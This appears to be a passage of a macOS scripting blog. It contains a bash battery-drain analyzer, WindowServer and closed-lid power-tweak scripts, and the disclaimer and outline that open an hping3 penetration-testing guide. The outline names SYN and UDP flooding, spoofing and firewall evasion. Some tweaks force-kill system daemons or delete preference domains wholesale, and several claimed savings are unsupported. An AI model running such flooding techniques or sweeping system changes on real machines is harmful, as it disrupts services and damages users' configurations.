Power assertions prevent your Mac from sleeping. Here's what's currently active:

\`\`\`
EOF
pmset -g assertions | grep -A 20 "Listed by owning process:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 2. Check sleep prevention
SLEEP_STATUS=$(pmset -g | grep "sleep" | head -1)
if [[ $SLEEP_STATUS == *"sleep prevented"* ]]; then
    echo "" >> "$REPORT_FILE"
    echo "⚠️ **WARNING:** Sleep is currently being prevented!" >> "$REPORT_FILE"
fi

# 3. Analyze power settings
echo "Analyzing power settings..."
cat >> "$REPORT_FILE" << EOF

## ⚙️ Power Management Settings

### Current Power Profile
\`\`\`
EOF
pmset -g >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# Identify problematic settings
cat >> "$REPORT_FILE" << EOF

### Problematic Settings for Battery Life
EOF

POWERNAP=$(pmset -g | grep "powernap" | awk '{print $2}')
TCPKEEPALIVE=$(pmset -g | grep "tcpkeepalive" | awk '{print $2}')
WOMP=$(pmset -g | grep "womp" | awk '{print $2}')
STANDBY=$(pmset -g | grep "standby" | awk '{print $2}')

if [[ "$POWERNAP" == "1" ]]; then
    echo "- ❌ **Power Nap is ENABLED** - Allows Mac to wake for updates (HIGH battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Power Nap is disabled" >> "$REPORT_FILE"
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    echo "- ⚠️ **TCP Keep-Alive is ENABLED** - Maintains network connections during sleep (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ TCP Keep-Alive is disabled" >> "$REPORT_FILE"
fi

if [[ "$WOMP" == "1" ]]; then
    echo "- ⚠️ **Wake on LAN is ENABLED** - Allows network wake (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Wake on LAN is disabled" >> "$REPORT_FILE"
fi

# 4. Collect CPU usage data
echo "Collecting CPU usage data..."
cat >> "$REPORT_FILE" << EOF

## 📊 Top Battery-Draining Processes

### Current CPU Usage (Higher CPU = More Battery Drain)
EOF

# Get top processes by CPU
top -l 2 -n 20 -o cpu -stats pid,command,cpu,mem,purg,user | tail -n 21 > "$TEMP_DIR/top_output.txt"

# Parse and format top output
echo "| PID | Process | CPU % | Memory | User |" >> "$REPORT_FILE"
echo "|-----|---------|-------|--------|------|" >> "$REPORT_FILE"
tail -n 20 "$TEMP_DIR/top_output.txt" | while read line; do
    if [[ ! -z "$line" ]] && [[ "$line" != *"PID"* ]]; then
        PID=$(echo "$line" | awk '{print $1}')
        PROCESS=$(echo "$line" | awk '{print $2}' | cut -c1-30)
        CPU=$(echo "$line" | awk '{print $3}')
        MEM=$(echo "$line" | awk '{print $4}')
        USER=$(echo "$line" | awk '{print $NF}')
        
        # Highlight high CPU processes
        # Use awk for floating point comparison to avoid bc dependency
        if awk "BEGIN {exit !($CPU > 10.0)}" 2>/dev/null; then
            echo "| $PID | **$PROCESS** | **$CPU** | $MEM | $USER |" >> "$REPORT_FILE"
        else
            echo "| $PID | $PROCESS | $CPU | $MEM | $USER |" >> "$REPORT_FILE"
        fi
    fi
done

# 5. Check for power metrics (if available with sudo)
if [[ $EUID -eq 0 ]]; then
    echo "Collecting detailed power metrics..."
    cat >> "$REPORT_FILE" << EOF

### Detailed Power Consumption Analysis
EOF
    
    # Run powermetrics for 2 seconds
    powermetrics --samplers tasks --show-process-energy -i 2000 -n 1 2>/dev/null > "$TEMP_DIR/powermetrics.txt"
    
    if [[ -s "$TEMP_DIR/powermetrics.txt" ]]; then
        echo '```' >> "$REPORT_FILE"
        grep -A 30 -F "*** Running tasks ***" "$TEMP_DIR/powermetrics.txt" | head -35 >> "$REPORT_FILE"
        echo '```' >> "$REPORT_FILE"
    fi
fi

# 6. Check wake reasons
echo "Analyzing wake patterns..."
cat >> "$REPORT_FILE" << EOF

## 💤 Sleep/Wake Analysis

### Recent Wake Events
These events show why your Mac woke from sleep:

\`\`\`
EOF
pmset -g log | grep -E "Wake from|DarkWake|Notification" | tail -10 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 7. Check scheduled wake events
cat >> "$REPORT_FILE" << EOF

### Scheduled Wake Requests
These are processes that have requested to wake your Mac:

\`\`\`
EOF
pmset -g log | grep "Wake Requests" | tail -5 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 8. Background services analysis
echo "Analyzing background services..."
cat >> "$REPORT_FILE" << EOF

## 🔄 Background Services Analysis

### Potentially Problematic Services
EOF

# Check for common battery-draining services
SERVICES_TO_CHECK=(
    "Spotlight:mds_stores"
    "Time Machine:backupd"
    "Photos:photoanalysisd"
    "iCloud:bird"
    "CrowdStrike:falcon"
    "Dropbox:Dropbox"
    "Google Drive:Google Drive"
    "OneDrive:OneDrive"
    "Creative Cloud:Creative Cloud"
    "Docker:com.docker"
    "Parallels:prl_"
    "VMware:vmware"
    "Spotify:Spotify"
    "Slack:Slack"
    "Microsoft Teams:Teams"
    "Zoom:zoom.us"
    "Chrome:Google Chrome"
    "Edge:Microsoft Edge"
)

echo "| Service | Status | Impact |" >> "$REPORT_FILE"
echo "|---------|--------|--------|" >> "$REPORT_FILE"

for service in "${SERVICES_TO_CHECK[@]}"; do
    IFS=':' read -r display_name process_name <<< "$service"
    # Use pgrep with fixed string matching to avoid regex issues
    if pgrep -qfi "$process_name" 2>/dev/null; then
        # Get CPU usage for this process (escape special characters)
        escaped_name=$(printf '%s\n' "$process_name" | sed 's/[[\.*^$()+?{|]/\\&/g')
        CPU_USAGE=$(ps aux | grep -i "$escaped_name" | grep -v grep | awk '{sum+=$3} END {print sum}')
        if [[ -z "$CPU_USAGE" ]]; then
            CPU_USAGE="0"
        fi
        
        # Determine impact level
        # Use awk for floating point comparison
        if awk "BEGIN {exit !($CPU_USAGE > 20.0)}" 2>/dev/null; then
            IMPACT="HIGH ⚠️"
        elif awk "BEGIN {exit !($CPU_USAGE > 5.0)}" 2>/dev/null; then
            IMPACT="MEDIUM"
        else
            IMPACT="LOW"
        fi
        
        echo "| $display_name | Running (${CPU_USAGE}% CPU) | $IMPACT |" >> "$REPORT_FILE"
    fi
done

# 9. Battery health check
echo "Checking battery health..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Battery Health Status

\`\`\`
EOF
system_profiler SPPowerDataType | grep -A 20 "Battery Information:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 10. Recommendations
cat >> "$REPORT_FILE" << EOF

## 💡 Recommendations

### Immediate Actions to Improve Battery Life

#### Critical (Do These First):
EOF

# Generate recommendations based on findings
if [[ "$POWERNAP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
1. **Disable Power Nap**
   \`\`\`bash
   sudo pmset -a powernap 0
   \`\`\`
EOF
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
2. **Disable TCP Keep-Alive**
   \`\`\`bash
   sudo pmset -a tcpkeepalive 0
   \`\`\`
EOF
fi

if [[ "$WOMP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
3. **Disable Wake for Network Access**
   \`\`\`bash
   sudo pmset -a womp 0
   \`\`\`
EOF
fi

cat >> "$REPORT_FILE" << EOF

#### Additional Optimizations:
4. **Reduce Display Sleep Time**
   \`\`\`bash
   sudo pmset -a displaysleep 5
   \`\`\`

5. **Enable Automatic Graphics Switching** (if available)
   \`\`\`bash
   sudo pmset -a gpuswitch 2
   \`\`\`

6. **Set Faster Standby Delay**
   \`\`\`bash
   sudo pmset -a standbydelay 1800  # 30 minutes
   \`\`\`

### Process-Specific Recommendations:
EOF

# Check for specific high-drain processes and provide detailed solutions
if pgrep -q "mds_stores" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 🔍 **Spotlight Indexing Detected**
**Problem:** Spotlight is actively indexing your drive, consuming significant CPU and battery.
**Solutions:**
- **Temporary pause:** \`sudo mdutil -a -i off\` (re-enable with \`on\`)
- **Check indexing status:** \`mdutil -s /\`
- **Rebuild index if stuck:** \`sudo mdutil -E /\`
- **Exclude folders:** System Settings > Siri & Spotlight > Spotlight Privacy

EOF
fi

if pgrep -q "backupd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 💾 **Time Machine Backup Running**
**Problem:** Active backup consuming resources.
**Solutions:**
- **Skip current backup:** Click Time Machine icon > Skip This Backup
- **Schedule for AC power:** \`sudo defaults write /Library/Preferences/com.apple.TimeMachine RequiresACPower -bool true\`
- **Reduce backup frequency:** Use TimeMachineEditor app
- **Check backup size:** \`tmutil listbackups | tail -1 | xargs tmutil calculatedrift\`

EOF
fi

if pgrep -q "photoanalysisd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 📸 **Photos Library Analysis Active**
**Problem:** Photos app analyzing images for faces, objects, and scenes.
**Solutions:**
- **Pause temporarily:** Quit Photos app completely
- **Disable features:** Photos > Settings > uncheck "Enable Machine Learning"
- **Process overnight:** Leave Mac plugged in overnight to complete
- **Check progress:** Activity Monitor > Search "photo"

EOF
fi

# Check for additional common issues
if pgrep -q "kernel_task" 2>/dev/null && [[ $(ps aux | grep "kernel_task" | grep -v grep | head -1 | awk '{print $3}' | cut -d. -f1) -gt 50 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🔥 **High kernel_task CPU Usage**
**Problem:** System thermal management or driver issues.
**Solutions:**
- **Reset SMC (Intel Macs):** Shut down > Press & hold Shift-Control-Option-Power for 10s (on Apple Silicon, just shut down, wait 30 seconds, and restart)
- **Check temperatures:** \`sudo powermetrics --samplers smc | grep temp\`
- **Disconnect peripherals:** Especially USB-C hubs and external displays
- **Update macOS:** Check for system updates
- **Safe mode test:** Restart holding Shift key

EOF
fi

if pgrep -q "WindowServer" 2>/dev/null && [[ $(ps aux | grep "WindowServer" | grep -v grep | head -1 | awk '{print $3}' | cut -d. -f1) -gt 30 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🖥️ **High WindowServer Usage**
**Problem:** Graphics rendering issues or display problems.
**Solutions:**
- **Reduce transparency:** System Settings > Accessibility > Display > Reduce transparency
- **Close visual apps:** Quit apps with animations or video
- **Reset display settings:** Option-click Scaled in Display settings
- **Disable display sleep prevention:** \`pmset -g assertions | grep -i display\`

EOF
fi

# 11. Battery drain score
echo "Calculating battery drain score..."
cat >> "$REPORT_FILE" << EOF

## 📈 Overall Battery Drain Score

EOF

# Calculate score (0-100, where 100 is worst)
SCORE=0
[[ "$POWERNAP" == "1" ]] && SCORE=$((SCORE + 30))
[[ "$TCPKEEPALIVE" == "1" ]] && SCORE=$((SCORE + 15))
[[ "$WOMP" == "1" ]] && SCORE=$((SCORE + 10))

# Add points for running services
pgrep -q "mds_stores" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "backupd" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "photoanalysisd" 2>/dev/null && SCORE=$((SCORE + 5))
pgrep -q "falcon" 2>/dev/null && SCORE=$((SCORE + 10))

# Determine rating
if [[ $SCORE -lt 20 ]]; then
    RATING="✅ **EXCELLENT** - Minimal battery drain expected"
elif [[ $SCORE -lt 40 ]]; then
    RATING="👍 **GOOD** - Some optimization possible"
elif [[ $SCORE -lt 60 ]]; then
    RATING="⚠️ **FAIR** - Noticeable battery drain"
else
    RATING="❌ **POOR** - Significant battery drain"
fi

cat >> "$REPORT_FILE" << EOF
**Battery Drain Score: $SCORE/100**  
**Rating: $RATING**

Higher scores indicate more battery drain. A score above 40 suggests optimization is needed.

---

## 📝 How to Use This Report

1. Review the **Executive Summary** for quick insights
2. Check **Problematic Settings** and apply recommended fixes
3. Identify high CPU processes in the **Top Battery-Draining Processes** section
4. Follow the **Recommendations** in order of priority
5. Re-run this script after making changes to measure improvement

## 🛠️ Common Battery Issues & Solutions

### 🔴 Critical Issues (Fix Immediately)

#### Sleep Prevention Issues
**Symptoms:** Mac won't sleep, battery drains with lid closed
**Diagnosis:** \`pmset -g assertions\`
**Solutions:**
- Identify apps preventing sleep: \`pmset -g assertions | grep -i prevent\`
- Force sleep: \`pmset sleepnow\`
- Reset power management: \`sudo pmset -a restoredefaults\`

#### Runaway Processes
**Symptoms:** Fan running constantly, Mac gets hot, rapid battery drain
**Diagnosis:** \`top -o cpu\` or Activity Monitor
**Solutions:**
- Force quit: \`kill -9 [PID]\` or Activity Monitor > Force Quit
- Disable startup items: System Settings > General > Login Items
- Clean launch agents: \`ls ~/Library/LaunchAgents\`

### 🟡 Common Issues

#### Bluetooth Battery Drain
**Problem:** Bluetooth constantly searching for devices
**Solutions:**
- Reset Bluetooth module: Shift+Option click BT icon > Reset
- Remove unused devices: System Settings > Bluetooth
- Disable when not needed: \`sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState 0\`

#### Safari/Chrome High Energy Use
**Problem:** Browser tabs consuming excessive resources
**Solutions:**
- Use Safari over Chrome (more efficient on Mac)
- Install ad blockers to reduce JavaScript load
- Limit tabs: Use OneTab or similar extension
- Disable auto-play: Safari > Settings > Websites > Auto-Play

#### External Display Issues
**Problem:** Discrete GPU activation draining battery
**Solutions:**
- Use single display when on battery
- Lower resolution: System Settings > Displays
- Use clamshell mode efficiently
- Check GPU: \`pmset -g | grep gpuswitch\`

#### Cloud Sync Services
**Problem:** Continuous syncing draining battery
**Solutions:**
- **iCloud:** System Settings > Apple ID > iCloud > Optimize Mac Storage
- **Dropbox:** Pause sync or use selective sync
- **OneDrive:** Pause syncing when on battery
- **Google Drive:** File Stream > Preferences > Bandwidth settings

### 🟢 Preventive Measures

#### Daily Habits
- Close apps instead of just minimizing
- Disconnect peripherals when not in use
- Use Safari for better battery life
- Enable Low Power Mode when unplugged
- Reduce screen brightness (saves 10-20% battery)

#### Weekly Maintenance
- Restart Mac weekly to clear memory
- Check Activity Monitor for unusual processes
- Update apps and macOS regularly
- Clear browser cache and cookies
- Review login items and launch agents

#### Monthly Checks
- Calibrate battery (full discharge and charge)
- Clean fans and vents for better cooling
- Review and remove unused apps
- Check storage (full drives impact performance)
- Run Disk Utility First Aid

### Quick Fix Scripts

#### 🚀 Basic Optimization (Safe)
Save and run this script to apply all recommended power optimizations:

\`\`\`bash
#!/bin/bash
# Apply all power optimizations
sudo pmset -a powernap 0
sudo pmset -a tcpkeepalive 0
sudo pmset -a womp 0
sudo pmset -a standbydelay 1800
sudo pmset -a displaysleep 5
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
echo "Power optimizations applied!"
\`\`\`

#### 💪 Aggressive Battery Saving
For maximum battery life (may affect convenience):

\`\`\`bash
#!/bin/bash
# Aggressive battery saving settings
sudo pmset -b displaysleep 2
sudo pmset -b disksleep 10
sudo pmset -b sleep 5
sudo pmset -b powernap 0
sudo pmset -b tcpkeepalive 0
sudo pmset -b womp 0
sudo pmset -b ttyskeepawake 0
sudo pmset -b gpuswitch 0  # Force integrated GPU
sudo pmset -b hibernatemode 25  # Hibernate only mode
echo "Aggressive battery settings applied!"
\`\`\`

#### 🔄 Reset to Defaults
To restore factory power settings:

\`\`\`bash
#!/bin/bash
sudo pmset -a restoredefaults
echo "Power settings restored to defaults"
\`\`\`

---

*Report generated by Battery Drain Analyzer v1.0*
EOF

# Cleanup
rm -rf "$TEMP_DIR"

# Summary
echo ""
echo -e "${GREEN}✅ Analysis Complete!${NC}"
echo "Report saved to: $REPORT_FILE"
echo ""
echo "Key findings:"
[[ "$POWERNAP" == "1" ]] && echo -e "${RED}  ❌ Power Nap is enabled (HIGH drain)${NC}"
[[ "$TCPKEEPALIVE" == "1" ]] && echo -e "${YELLOW}  ⚠️ TCP Keep-Alive is enabled (MEDIUM drain)${NC}"
[[ "$WOMP" == "1" ]] && echo -e "${YELLOW}  ⚠️ Wake on LAN is enabled (MEDIUM drain)${NC}"
echo ""
echo "To view the full report:"
echo "  cat $REPORT_FILE"
echo ""
echo "To apply all recommended fixes:"
echo "  sudo pmset -a powernap 0 tcpkeepalive 0 womp 0"

EOF

chmod +x ~/battery_drain_analyzer.sh
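
The drain score the analyzer computes in steps 10-11 is simply a weighted sum over the detected flags and services. The arithmetic can be pulled out into a standalone function, which makes the weighting easy to audit (the function name `drain_score` is illustrative, not part of the analyzer itself):

```shell
#!/bin/sh
# Recompute the analyzer's 0-100 drain score from seven inputs
# (1 = flag enabled / service running, 0 = off). The weights mirror
# those in the report script above.
drain_score() {
    score=0
    if [ "$1" = "1" ]; then score=$((score + 30)); fi   # Power Nap
    if [ "$2" = "1" ]; then score=$((score + 15)); fi   # TCP Keep-Alive
    if [ "$3" = "1" ]; then score=$((score + 10)); fi   # Wake on LAN (womp)
    if [ "$4" = "1" ]; then score=$((score + 10)); fi   # Spotlight (mds_stores)
    if [ "$5" = "1" ]; then score=$((score + 10)); fi   # Time Machine (backupd)
    if [ "$6" = "1" ]; then score=$((score + 5)); fi    # photoanalysisd
    if [ "$7" = "1" ]; then score=$((score + 10)); fi   # Falcon agent
    echo "$score"
}

drain_score 1 1 1 0 0 0 0   # all three pmset flags on -> 55 ("FAIR")
drain_score 0 0 0 1 1 1 0   # only background services  -> 25 ("GOOD")
```

Because the thresholds are 20/40/60, the three pmset flags alone (score 55) are enough to push a machine into "FAIR" territory, which is why they top the recommendations list.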

If you see WindowServer as your top consumer, consider the following:

# 1. Restart WindowServer (logs you out!)
sudo killall -HUP WindowServer

# 2. Reduce transparency
defaults write com.apple.universalaccess reduceTransparency -bool true

# 3. Disable animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false

# 4. Reset display preferences
rm ~/Library/Preferences/com.apple.windowserver.plist
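
Before applying any of these, it is worth confirming that WindowServer really is the heavy hitter. The `ps`-parsing idea used elsewhere in this guide can be isolated into a small helper that copes with multiple matching lines (the sample `ps` line below is fabricated for illustration):

```shell
#!/bin/sh
# Return success if a named process exceeds a CPU% threshold in
# `ps aux`-style output (column 3 is %CPU).
cpu_over() {  # usage: cpu_over <name> <limit>  (reads ps output on stdin)
    awk -v name="$1" -v limit="$2" '
        $0 ~ name { if ($3 + 0 > limit) hit = 1 }
        END { exit hit ? 0 : 1 }'
}

# Fabricated single line of `ps aux` output for demonstration:
SAMPLE='_windowserver 150 34.5 0.2 4096 1234 ?? Ss 9:00AM 1:23.45 /System/Library/CoreServices/WindowServer'

if echo "$SAMPLE" | cpu_over WindowServer 30; then
    echo "WindowServer is hot"
fi
```

On a live system you would feed it real data, e.g. `ps aux | cpu_over WindowServer 30 && echo "apply fixes"`.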

Finer-grained optimisations:

#!/bin/bash

echo "🔧 Applying ALL WindowServer Optimizations for M3 MacBook Pro..."
echo "This will reduce power consumption significantly"
echo ""

# ============================================
# VISUAL EFFECTS & ANIMATIONS (30-40% reduction)
# ============================================
echo "Disabling visual effects and animations..."

# Reduce transparency and motion
defaults write com.apple.universalaccess reduceTransparency -bool true
defaults write com.apple.universalaccess reduceMotion -bool true
defaults write com.apple.Accessibility ReduceMotionEnabled -int 1

# Disable smooth scrolling and window animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSScrollAnimationEnabled -bool false
defaults write NSGlobalDomain NSScrollViewRubberbanding -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write NSGlobalDomain NSDocumentRevisionsWindowTransformAnimation -bool false
defaults write NSGlobalDomain NSToolbarFullScreenAnimationDuration -float 0
defaults write NSGlobalDomain NSBrowserColumnAnimationSpeedMultiplier -float 0

# Dock optimizations
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
defaults write com.apple.dock mineffect -string "scale"
defaults write com.apple.dock show-recents -bool false
defaults write com.apple.dock expose-animation-duration -float 0.1
defaults write com.apple.dock hide-mirror -bool true

# Mission Control optimizations
defaults write com.apple.dock expose-group-by-app -bool false
defaults write com.apple.dock mru-spaces -bool false
defaults write com.apple.dock dashboard-in-overlay -bool true

# Finder optimizations
defaults write com.apple.finder DisableAllAnimations -bool true
defaults write com.apple.finder AnimateWindowZoom -bool false
defaults write com.apple.finder AnimateInfoPanes -bool false
defaults write com.apple.finder FXEnableSlowAnimation -bool false

# Quick Look animations
defaults write -g QLPanelAnimationDuration -float 0

# Mail animations
defaults write com.apple.mail DisableReplyAnimations -bool true
defaults write com.apple.mail DisableSendAnimations -bool true

# ============================================
# M3-SPECIFIC OPTIMIZATIONS (10-15% reduction)
# ============================================
echo "Applying M3-specific optimizations..."

# Disable font smoothing (M3 handles text well without it)
defaults -currentHost write NSGlobalDomain AppleFontSmoothing -int 0
defaults write NSGlobalDomain CGFontRenderingFontSmoothingDisabled -bool true

# Optimize for battery when unplugged
sudo pmset -b gpuswitch 0  # Force integrated GPU (dual-GPU Intel Macs only; no effect on Apple Silicon)
sudo pmset -b lessbright 1 # Slightly dim display on battery
sudo pmset -b displaysleep 5  # Faster display sleep

# Reduce background rendering
defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false
defaults write NSGlobalDomain NSDisableAutomaticTermination -bool true

# ============================================
# BROWSER OPTIMIZATIONS (15-25% reduction)
# ============================================
echo "Optimizing browsers..."

# Chrome optimizations
defaults write com.google.Chrome DisableHardwareAcceleration -bool true
defaults write com.google.Chrome CGDisableCoreAnimation -bool true
defaults write com.google.Chrome RendererProcessLimit -int 2
defaults write com.google.Chrome NSQuitAlwaysKeepsWindows -bool false

# Safari optimizations (more efficient than Chrome)
defaults write com.apple.Safari WebKitAcceleratedCompositingEnabled -bool false
defaults write com.apple.Safari WebKitWebGLEnabled -bool false
defaults write com.apple.Safari WebKit2WebGLEnabled -bool false

# Stable browser (if Chromium-based)
defaults write com.stable.browser DisableHardwareAcceleration -bool true

# ============================================
# ADVANCED WINDOWSERVER TWEAKS (5-10% reduction)
# ============================================
echo "Applying advanced WindowServer tweaks..."

# Reduce compositor update rate
defaults write com.apple.WindowManager StandardHideDelay -int 0
defaults write com.apple.WindowManager StandardHideTime -int 0
defaults write com.apple.WindowManager EnableStandardClickToShowDesktop -bool false

# Reduce shadow calculations
defaults write NSGlobalDomain NSUseLeopardWindowShadow -bool true

# Disable Dashboard
defaults write com.apple.dashboard mcx-disabled -bool true

# Menu bar transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false

# ============================================
# DISPLAY SETTINGS (20-30% reduction)
# ============================================
echo "Optimizing display settings..."

# Enable automatic brightness adjustment
sudo defaults write /Library/Preferences/com.apple.iokit.AmbientLightSensor "Automatic Display Enabled" -bool true

# Power management settings
sudo pmset -a displaysleep 5
sudo pmset -a disksleep 10
sudo pmset -a sleep 15
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800

# ============================================
# BACKGROUND SERVICES
# ============================================
echo "Optimizing background services..."

# Reduce Spotlight activity
sudo mdutil -a -i off  # Temporarily disable, re-enable with 'on'

# Limit background app refresh
defaults write NSGlobalDomain NSAppSleepDisabled -bool false

# ============================================
# APPLY ALL CHANGES
# ============================================
echo "Applying changes..."

# Restart affected services
killall Dock
killall Finder
killall SystemUIServer
killall Mail 2>/dev/null
killall Safari 2>/dev/null
killall "Google Chrome" 2>/dev/null

echo ""
echo "✅ All optimizations applied!"
echo ""
echo "📊 Expected improvements:"
echo "  • WindowServer CPU: 4.5% → 1-2%"
echo "  • Battery life gain: +1-2 hours"
echo "  • GPU power reduction: ~30-40%"
echo ""
echo "⚠️  IMPORTANT: Please log out and back in for all changes to take full effect"
echo ""
echo "💡 To monitor WindowServer usage:"
echo "   ps aux | grep WindowServer | grep -v grep | awk '{print \$3\"%\"}'"
echo ""
echo "🔄 To revert all changes, run:"
echo "   defaults delete com.apple.universalaccess"
echo "   defaults delete NSGlobalDomain"
echo "   defaults delete com.apple.dock"
echo "   killall Dock && killall Finder"

To optimise power consumption when the lid is closed, the following script applies several options:

#!/bin/bash

echo "🔋 Applying CRITICAL closed-lid battery optimizations for M3 MacBook Pro..."
echo "These settings specifically target battery drain when lid is closed"
echo ""

# ============================================
# #1 HIGHEST IMPACT (50-70% reduction when lid closed)
# ============================================
echo "1️⃣ Disabling Power Nap (HIGHEST IMPACT - stops wake for updates)..."
sudo pmset -a powernap 0

echo "2️⃣ Disabling TCP Keep-Alive (HIGH IMPACT - stops network maintenance)..."
sudo pmset -a tcpkeepalive 0

echo "3️⃣ Disabling Wake for Network Access (HIGH IMPACT - prevents network wakes)..."
sudo pmset -a womp 0

# ============================================
# #2 HIGH IMPACT (20-30% reduction)
# ============================================
echo "4️⃣ Setting aggressive sleep settings..."
# When on battery, sleep faster and deeper
sudo pmset -b sleep 1                    # Sleep after 1 minute of inactivity
sudo pmset -b disksleep 5                # Spin down disk after 5 minutes
sudo pmset -b hibernatemode 25           # Hibernate only (no sleep+RAM power)
sudo pmset -b standbydelay 300           # Enter standby after 5 minutes
sudo pmset -b autopoweroff 1             # Enable auto power off
sudo pmset -b autopoweroffdelay 900      # Power off after 15 minutes

echo "5️⃣ Disabling wake features..."
sudo pmset -a ttyskeepawake 0           # Don't wake for terminal sessions
sudo pmset -a lidwake 0                  # Don't wake on lid open (until power button)
sudo pmset -a acwake 0                   # Don't wake on AC attach

# ============================================
# #3 MEDIUM IMPACT (10-20% reduction)
# ============================================
echo "6️⃣ Disabling background services that wake the system..."

# Disable Bluetooth wake
sudo defaults write /Library/Preferences/com.apple.Bluetooth.plist ControllerPowerState 0

# Disable Location Services wake
sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false

# Disable Find My wake events
sudo pmset -a proximityWake 0 2>/dev/null

# Disable Handoff/Continuity features that might wake
sudo defaults write com.apple.Handoff HandoffEnabled -bool false

# ============================================
# #4 SPECIFIC WAKE PREVENTION (5-10% reduction)
# ============================================
echo "7️⃣ Preventing specific wake events..."

# Disable scheduled wake events
sudo pmset repeat cancel

# Clear any existing scheduled events
sudo pmset schedule cancelall

# Disable DarkWake (background wake without display)
sudo pmset -a darkwakes 0 2>/dev/null

# Disable wake for Time Machine
sudo defaults write /Library/Preferences/com.apple.TimeMachine.plist RequiresACPower -bool true

# ============================================
# #5 BACKGROUND APP PREVENTION
# ============================================
echo "8️⃣ Stopping apps from preventing sleep..."

# Kill processes that commonly prevent sleep
killall -9 photoanalysisd 2>/dev/null
killall -9 mds_stores 2>/dev/null
killall -9 backupd 2>/dev/null

# Disable Spotlight indexing when on battery
sudo mdutil -a -i off

# Disable Photos analysis
launchctl disable user/$UID/com.apple.photoanalysisd

# ============================================
# VERIFY SETTINGS
# ============================================
echo ""
echo "✅ Closed-lid optimizations complete! Verifying..."
echo ""
echo "Current problematic settings status:"
pmset -g | grep -E "powernap|tcpkeepalive|womp|sleep|hibernatemode|standby|lidwake"

echo ""
echo "Checking what might still wake your Mac:"
pmset -g assertions | grep -i "prevent"

echo ""
echo "==============================================="
echo "🎯 EXPECTED RESULTS WITH LID CLOSED:"
echo "  • Battery drain: 1-2% per hour (down from 5-10%)"
echo "  • No wake events except opening lid + pressing power"
echo "  • Background services completely disabled"
echo ""
echo "⚠️ TRADE-OFFS:"
echo "  • No email/message updates with lid closed"
echo "  • No Time Machine backups on battery"
echo "  • Must press power button after opening lid"
echo "  • Handoff/AirDrop disabled"
echo ""
echo "🔄 TO RESTORE CONVENIENCE FEATURES:"
echo "sudo pmset -a powernap 1 tcpkeepalive 1 womp 1 lidwake 1"
echo "sudo pmset -b hibernatemode 3 standbydelay 10800"
echo "sudo mdutil -a -i on"
echo ""
echo "📊 TEST YOUR BATTERY DRAIN:"
echo "1. Note battery % and close lid"
echo "2. Wait 1 hour"
echo "3. Open and check battery %"
echo "4. Should lose only 1-2%"
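
The verification step at the end of the script greps raw `pmset -g` output. If you instead want a single flag's value in a variable (to script your own before/after checks), a small awk helper does it; the sample output below is fabricated but follows `pmset -g`'s "name value" layout:

```shell
#!/bin/sh
# Extract one flag's value from `pmset -g`-style "name  value" output.
pm_flag() {  # usage: pmset -g | pm_flag <flagname>
    awk -v k="$1" '$1 == k { print $2 }'
}

# Fabricated pmset -g excerpt:
SAMPLE=' powernap             1
 tcpkeepalive         1
 womp                 0'

echo "$SAMPLE" | pm_flag powernap   # -> 1
echo "$SAMPLE" | pm_flag womp       # -> 0
```

For example, `[ "$(pmset -g | pm_flag powernap)" = "0" ]` confirms Power Nap stayed disabled after a reboot.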

macOS Penetration Testing Guide Using hping3

⚠️ LEGAL DISCLAIMER AND TERMS OF USE

**READ THIS CAREFULLY BEFORE PROCEEDING**

Legal Requirements:
**AUTHORIZATION REQUIRED**: You MUST have explicit written permission from the system owner before running any of these tests
**ILLEGAL WITHOUT PERMISSION**: Unauthorized network scanning, port scanning, or DoS testing is illegal in most jurisdictions
**YOUR RESPONSIBILITY**: You are solely responsible for ensuring compliance with all applicable laws and regulations
**NO LIABILITY**: The authors assume no liability for misuse of this information

Appropriate Usage:
– ✅ **Authorized penetration testing** with signed agreements
– ✅ **Testing your own systems** and networks
– ✅ **Educational purposes** in controlled lab environments
– ✅ **Security research** with proper authorization
– ❌ **Unauthorized scanning** of third-party systems
– ❌ **Malicious attacks** or disruption of services
– ❌ **Testing without permission** regardless of intent

Overview:

This comprehensive guide provides 10 different hping3 penetration testing techniques specifically designed for macOS systems. hping3 is a command-line packet crafting tool that allows security professionals to perform network reconnaissance, port scanning, and security assessments.

What You’ll Learn:

This guide includes detailed scripts covering:

🔍 Discovery Techniques
– ICMP host discovery and network sweeps
– TCP SYN pings for firewall-resistant discovery

🚪 Port Scanning Methods
– TCP SYN scanning with stealth techniques
– Common ports scanning with service identification
– Advanced evasion techniques (FIN, NULL, XMAS scans)

🛡️ Firewall Evasion
– Source port spoofing and packet fragmentation
– Random source address scanning

💥 Stress Testing
– UDP flood testing and multi-process SYN flood attacks

macOS Installation and Setup:

